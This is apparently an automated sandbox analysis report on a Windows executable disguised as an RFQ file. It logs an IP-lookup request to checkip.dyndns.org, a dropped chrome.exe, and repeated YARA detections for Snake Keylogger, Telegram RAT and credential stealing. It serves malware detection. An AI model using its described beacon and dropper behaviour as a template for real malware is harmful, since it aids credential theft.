                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.349740132.226.8.16980C:\Users\user\Desktop\RFQ__637456464647.exe
                                  TimestampkBytes transferredDirectionData
                                  May 23, 2022 19:00:12.710165977 CEST1139OUTGET / HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                  Host: checkip.dyndns.org
                                  Connection: Keep-Alive
                                  May 23, 2022 19:00:13.988107920 CEST1139INHTTP/1.1 200 OK
                                  Date: Mon, 23 May 2022 17:00:13 GMT
                                  Content-Type: text/html
                                  Content-Length: 103
                                  Connection: keep-alive
                                  Cache-Control: no-cache
                                  Pragma: no-cache
                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.19</body></html>


                                  Statistics

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:18:59:56
                                  Start date:23/05/2022
                                  Path:C:\Users\user\Desktop\RFQ__637456464647.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\RFQ__637456464647.exe"
                                  Imagebase:0xd20000
                                  File size:2844160 bytes
                                  MD5 hash:B4BC907E8D48E8F09B4D9FDD8D416599
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:low

                                  General

                                  Target ID:1
                                  Start time:18:59:58
                                  Start date:23/05/2022
                                  Path:C:\Users\user\Desktop\RFQ__637456464647.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\RFQ__637456464647.exe
                                  Imagebase:0x8f0000
                                  File size:2844160 bytes
                                  MD5 hash:B4BC907E8D48E8F09B4D9FDD8D416599
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:low

                                  General

                                  Target ID:5
                                  Start time:19:00:08
                                  Start date:23/05/2022
                                  Path:C:\Users\user\AppData\Local\Temp\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Local\Temp\chrome.exe"
                                  Imagebase:0x7ff7a8a70000
                                  File size:2622352 bytes
                                  MD5 hash:7F916511A313837EFCDE9E4112A64E5B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 0%, Metadefender, Browse
                                  • Detection: 0%, ReversingLabs
                                  Reputation:low

                                  General

                                  Target ID:13
                                  Start time:19:00:19
                                  Start date:23/05/2022
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 1296
                                  Imagebase:0xf40000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:high

                                  Disassembly

                                  No disassembly